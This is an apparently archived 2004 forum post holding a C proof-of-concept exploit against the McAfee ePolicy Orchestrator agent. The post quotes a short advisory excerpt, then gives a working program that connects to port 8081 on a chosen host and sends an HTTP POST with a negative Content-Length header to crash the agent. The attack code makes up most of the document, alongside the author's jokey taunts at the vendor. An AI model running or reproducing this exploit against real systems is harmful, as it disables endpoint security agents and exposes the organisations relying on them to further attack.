
Author: 맥 | McAfee ePolicy Orchestrator Agent | Views: 6211


/*

>McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability PoC

>Ref : http://securityfocus.com/bid/9476
>discovered by : cyber_flash@hotmail.com

"
The McAfee ePolicy Orchestrator agent has been reported to a buffer
management vulnerability that may be exploited to crash the affected
agent. Although unconfirmed, it has been reported that the issue may
also allow a remote attacker to trigger a buffer overflow vulnerability.

The issue reportedly presents itself, because certain values in HTTP POST
headers processed by the ePolicy Orchestrator are not sufficiently
sanitized.
"

>Hi NA-eye ;-) . Hurry-yup . release a patch guyz !

+ PoC by Shashank Pandey a.k.a G0D_0F_z10N +

> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while i wuz writing this..!

> lame coding ..dont think too much abt it...

*/


#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strlen() */

#pragma comment (lib,"ws2_32")

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    int s;
    struct hostent *yo;
    struct sockaddr_in wutever;

    /* Request sent to the agent; the Content-Length header carries a negative value */
    char badb0y[] =
        "POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0\r\n"
        "Accept: application/octet-stream\r\n"
        "Accept-Language: en-us\r\n"
        "Content-Type: application/octet-stream\r\n"
        "User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0; Windows)\r\n"
        "Host: EPO_DIE\r\n"
        "Content-Length: -1\r\n"
        "Connection: Keep-Alive\r\n\r\n";

    printf("\n--------------------------------- ");
    printf("\n McAfee ePO agent overflow PoC \n");
    printf("+++++++++++++++++++++++++++++++++\n");
    printf(" by Shashank Pandey \n");
    printf(" (reach_shash@linuxmail.org) \n");
    printf("--------------------------------- \n");

    /* Initialise Winsock (version 1.1) */
    if (WSAStartup(0x0101, &wsaData) != 0) {
        printf("Error :Cudn't initiate winsock!");
        return 0;
    }

    if (argc < 2) {
        printf("\nUsage : %s <I.P./Hostname>\n\n", argv[0]);
        exit(0);
    }

    /* Resolve the host given on the command line */
    if ((yo = gethostbyname(argv[1])) == 0) {
        printf("error: can't resolve '%s'", argv[1]);
        return 1;
    }

    /* ePO agent uses the HTTP protocol to communicate on port 8081 */
    wutever.sin_port = htons(8081);
    wutever.sin_family = AF_INET;
    wutever.sin_addr = *((struct in_addr *)yo->h_addr);

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("error: can't create socket");
        return 1;
    }

    if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1) {
        printf("Error:Cudn't Connect\r\n");
        return 1;
    }

    printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");

    /* Send the request, then tear the connection down */
    send(s, badb0y, strlen(badb0y), 0);

    closesocket(s);
    WSACleanup();

    return 1;
}


Related posts: none | Posted: 2004/02/04 21:17 from 61.82.164.84
